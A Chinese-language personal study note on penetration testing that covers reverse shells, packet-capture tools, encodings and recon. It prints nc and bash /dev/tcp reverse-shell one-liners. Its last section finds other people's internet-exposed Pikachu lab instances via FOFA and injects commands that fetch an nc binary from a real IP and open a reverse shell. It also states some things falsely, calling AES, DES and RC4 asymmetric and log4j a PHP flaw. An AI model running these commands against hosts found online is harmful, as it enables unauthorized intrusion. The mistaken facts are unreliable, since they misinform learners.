2026-09-10 15:54:16 | 网络安全

网络安全学习笔记(小迪)

https://www.cnblogs.com/sunny11/p/13583083.html

https://forum.ywhack.com/bountytips.php?download

https://forum.ywhack.com/reverse-shell/

https://blog.csdn.net/weixin_43303273/article/details/83029138

基础知识

1. 反弹shell-解决数据回显和交互式回显、数据通信问题

nc工具(Netcat):接收反向shell

1
2
3
4
Server:nc -lvvp 5577 # 监听该端口,返回极其详细的日志
Client: nc -e cmd sever_ip 5577 # 主动发起 TCP 三次握手连接
Client(MacOS): /bin/bash -c 'bash -i >& /dev/tcp/sever_ip/5577 0>&1'
curl -4 cip.cc # 快速查询本机公网ip

交换c、s,可以交换出入站,绕开防火墙

反向连接:让目标主机主动连接进攻主机。正向连接则相反

2. Web 应用

  • 环境架构

    • 开发语言
    • 程序源码:开发语言、应用类型、开源CMS、开发框架等
    • 中间件容器、数据库类型、服务器操作系统、第三方软件等
  • 安全漏洞分类

    SQL注入、文件安全、RCE执行、XSS跨站、CSRF/SSRF/CRLF、反序列化、逻辑越权、未授权访问、XXE/XML、弱口令安全等

  • 抓包、封包…

    • 抓包:截获请求,看请求了什么地址、用了什么参数、服务器返回了什么等等

    • 封包:按照某个App或协议要求的格式,构造出类似的请求数据,比如填写请求头、参数、二进制字段、校验值等,再发送给服务器。

      常用于做游戏外挂

      能精确到每个操作的数据包,例如利用封包,能直接操作游戏中的回城功能。

    • 应用分类

      • Web应用站点操作数据抓包-浏览器F12网络监听
      • APP、小程序、PC抓包HTTP/S数据-Fiddler、Charles、BurpSuite
      • 程序进程、网络接口、其他协议抓包-WireShark、科来网络分析系统
      • 通讯类应用程序封包分析发送接收-WPE四件套封包、科来网络分析系统
  • 工具

    • Fiddler、Charles、BurpSuite:HTTP协议

      抓取对象:APP、小程序、PC抓包。
      Fiddler、Charles纯抓包

      Bp可以用于重放或者别的安全测试

    • Wireshark、科来网络分析系统、TCPDump:其他协议,网络封包分析软件

      • 科来网络分析系统

        可筛选进程的数据包,新手友好

    • 隧道代理:应对拉黑IP和封IP问题

      local-proxy-target

      例如local被target拉黑了,那就可以通过代理请求。且每次请求可以换不同代理

    • 其他辅助工具

      • BurpSuite:Web抓包工具
      • Charles:将包按照URL地址分类,便于查看。触发相关地址时高亮
      • Proxy Switchy(浏览器插件抓包插件):其实就是为浏览器单独设置代理,让请求和响应变为server-bp-browser。即使不通过插件,应该也有别的方式实现。好像可以直接为电脑设置代理,这样web和小程序都能走bp
      • Proxifier(电脑上的微信小程序抓包软件)
      • 安卓模拟器:逍遥、雷电、夜神
      • CCProxy:APK-CCProxy-WPE监控cc进行,实现封包抓包
  • 考虑阻碍

    • 站库分离
    • CDN加速服务,如果找到的是缓存,攻击的也是缓存,需要找到真正的服务器ip
    • 负载均衡服务,多台服务器提供服务,可能找到的只是备用机(目标一般是主控),备用机可能想要的东西
    • WAF应用防火墙
    • 主机防护防火墙
  • 加密编码

    • 常见

      • 密码存储加密:MD5(32|16), SHA1(40), NTLM, AES, DES, RC4

        • MD5可能会加上Salt,增加破解难度
        • NTLM,Windows的哈希密码,标准通讯安全协议
        • AES, DES, RC4,都是非对称加密算法,引入密钥,密文特征与BASE64相似
      • 传输数据编码:BASE64, URL, HEX, ASCII

        应用场景:参数传递(如注入影响,后期WAF绕过干扰写法应用、视频地址还原等)

        • BASE64:大小写敏感,结尾通常有符号=
        • URL:大小写敏感,通常以%数字字母间隔
      • JS前端代码加密:JS颜文字,jother,JSFUCK

        • jother特征:只用! + ()[]{}这八个字符,就能完成对任意字符串的编码,也可在F12中解密执行
        • JSFUCK特征:与jother类似,只是少了{}
      • 后端代码加密:PHP, .NET, JAVA

        应用场景:版权代码加密,开发特性,CTF比赛等

        • PHP,乱码,头部有信息,例如Zendxxxx就用了zend|54加密

        • .NET:DLL封装代码文件

          解密软件:ILSpy

        • JAVA:JAR & CLASS文件

      • 数据库加密:MYSQL,MSSQL等

      • 数据显示编码:UTF-8,GBK2312等

    • 识别算法编码类型

      • 看密文位数
      • 看密文特征(数字、字母、大小写、符号等)
      • 看当前密文存在的地方(Web、数据库、操作系统等应用)
    • 解密:逆运算、枚举、碰撞

    • 部分参考资源

      http://www.hiencode.com/

      https://jsfuck.com/

3. 信息打点

a. Web架构-语言&中间件&数据库&系统等

  • 判断服务器系统:URL大小写,TTL

  • 数据库、中间件:通过常用搭建组合 或 端口扫描判定

    • 常见组合

      • IIS - windows
      • aspx - mssql
    • 数据库常见端口

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      - 关系数据库
      - MySQL 3306
      - Oracle 1521
      - SQL Server 1433
      - DB2, Sybase 5000
      - PostgreSQL 5432
      - DM达梦数据库 5236
      - NoSQL数据库
      - Redis 6379
      - Memcached 11211
      - MongoDB 27017

    • 源码

      • 直接利用公开漏洞库尝试安全测试
      • 白盒代码审计 挖漏洞
    • mysql:漏洞或弱口令等

    • PHP:常规漏洞,如log4j

    • 中间件漏洞网络上有很多文章汇总

    • 主动式探针 & 被动式探针

      SRC 是各大互联网厂商开启的漏洞发现奖励计划(漏洞赏金计划),旨在鼓励广大安全研究人员积极发现厂商产品或服务安全漏洞,并向厂商提交漏洞报告。

      https://www.butian.net/Reward/plan/2

b. Web源码-CMS开源&闭源售卖&自主研发等

c. Web源码获取-泄露安全&资源监控&其他等

d. Web域名-子域名&相似域名&反查域名&旁注等

在线靶场

FOFAfofa.so)是国内著名的网络空间测绘搜索引擎

Pikachu 是一个专门用来练习网络安全技能的漏洞测试靶场

1
2
3
4
5
6
7
8
9
10
11
# 搜索中国大陆和港澳台的 pikachu 靶场
"pikachu" && country="CN" && title=="Get the pikachu"

# 挨个尝试,看哪个靶场能执行命令
# RCE 里的 Ping,输入 127.0.0.1 看看是否有返回

# 对靶场
127.0.0.1 & curl -v -m 5 http://8.133.245.52/nc -o /tmp/n 2>&1 # 8000可能被靶场防火墙拦截
127.0.0.1 & chmod +x /tmp/n
127.0.0.1 & /tmp/n -h
127.0.0.1 & bash -c 'bash -i >& /dev/tcp/8.133.245.52/5577 0>&1'

![image-20260825160246628](…/…/…/…/Library/Application Support/typora-user-images/image-20260825160246628.png)